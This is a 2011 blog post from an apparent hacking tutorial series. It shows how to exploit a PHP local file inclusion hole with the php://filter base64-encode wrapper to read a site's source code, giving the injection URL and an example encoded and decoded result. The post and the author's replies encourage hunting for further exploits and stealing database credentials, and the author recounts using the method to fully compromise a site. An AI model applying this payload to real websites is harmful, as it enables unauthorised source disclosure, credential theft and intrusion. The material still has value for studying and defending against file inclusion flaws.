Thursday, December 8, 2011

LFI TIP: HOW TO READ SOURCE CODE USING PHP://FILTER

OK so you wont be able to shell a site everytime you find a LFI vulnerability. That being said doesn’t mean we still cant work on a few other methods and still manage to walk away with some valuable information. Today I will show you briefly another method which can be leveraged when you find an LFI vulnerability to get that job done through the use of php:// filters

OK so you have found your LFI link but cant get access to logs or conditions aren’t right for gaining shell access:

OK, well before you give up and go report the site is only mildly vulnerable we will test further to see if we can read any of the target servers files. We will use a method to view the source of any PHP file through the use of the PHP filter wrapper function “php://filter/convert.base64_encode/resource=” which has been available since PHP 5.0.0. The syntax to use works like this:

SYNTAX:
http://www.site.com/vulnpage.php?page=php://filter/convert.base64-encode/resource=FileNameToRead

I should note that in most cases include function will append the “.php” to your FileNameToRead BUT in some cases you may need to define this in your injection by also including the file ending (.php). Through this method it forces PHP to base64 encode the target file before excecuting and then returning that encoding to us. We can then simply decode the results after this with our favorite tool and obtain the source code of the PHP files on the target site.

RETURNED RESULT:
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMC8vRU4iPgo8aHRtbD4KPGhlYWQ+CiAgPHRpdGxlPk15IEZpcnN0IFRlc3QgU2l0ZTwvdGl0bGU+CiAgPE1FVEEgSFRUUC1FUVVJVj0iUmVmcmVzaCIgQ09OVEVOVD0iMTsgVVJMPWh0dHA6Ly90ZXN0c2l0ZS5jb20vaW5kZXgucGhwIj4KPC9oZWFkPgo8Ym9keT4KPGRpdiBhbGlnbj0iY2VudGVyIj4KICAgIElmIHlvdSBhcmUgbm90IHJlZGlyZWN0ZWQgcGxlYXNlIGNsaWNrIDxhIGhyZWY9IiBodHRwOi8vdGVzdHNpdGUuY29tL2luZGV4LnBocCAiPmhlcmU8L2E+Lgo8L2Rpdj4KPC9ib2R5Pgo8L2h0bWw+



If we base64 decode the results, we see the actual source code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
  <title>My First Test Site</title>
  <META HTTP-EQUIV="Refresh" CONTENT="1; URL=http://testsite.com/index.php">
</head>
<body>
<div align="center">
    If you are not redirected please click <a href=" http://testsite.com/index.php ">here</a>.
</div>
</body>
</html>

You can now go through source code to review for further code exploits, SQL injections, or enumerate for configuration files and try to grab juicy connection credentials. The options are up to you, but thought I would add this to the LFI series since I have not seen it discussed very much. Hope you were able to follow along and until next time…Enjoy!

7 comments:

  1. I have no words for this great post such a awe-some information i got gathered. Thanks to Author.
    flash to html5 converter

    ReplyDelete
    Replies
    1. Glad it was helpful for at least one person. This method saved me the other day on a job when I thought I had no options left and voila I was able to read the configuration file which the admin re-used credentials and allowed full comprimise of site and database as result :P

      Delete
  2. hi HR , At first I wanna thank you for such a great job and tutos.
    By the way , I still have a little issue with the php://filter.
    how can I use filter such as php://filter/convert.base64-encode/resource=whatever.file when the programmer used

    $page=$_GET['page']
    include('doc/'.$page); for exemple ??
    thanks again ;)

    ReplyDelete
    Replies
    1. Thanks for the kind feedback, always appreciated! Unfortunately you can't bypass this situation to my knowledge. When you're facing the prefixed directory it kills any chance of using the alternative data stream attacks :(

      Delete
  3. I am having these errors. Please, tell me what and how they occured.

    Warning: include() [function.include]: Failed opening 'php://filter/convert.base64-encode/resource=facebookhacking.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/a9546567/public_html/ethipedia/index.php on line 7

    ReplyDelete
  4. Try it with the full path to the file you want (i.e. /home/a9546567/public_html/ethipedia/facebookhacking (no .php due to appendage applied). Enjoi

    ReplyDelete
  5. I believe Web time sheet software makes the complete employee time clock tracking task easier. Its easy to update, approve and maintain the time sheets in no time.Time Attendance System

    ReplyDelete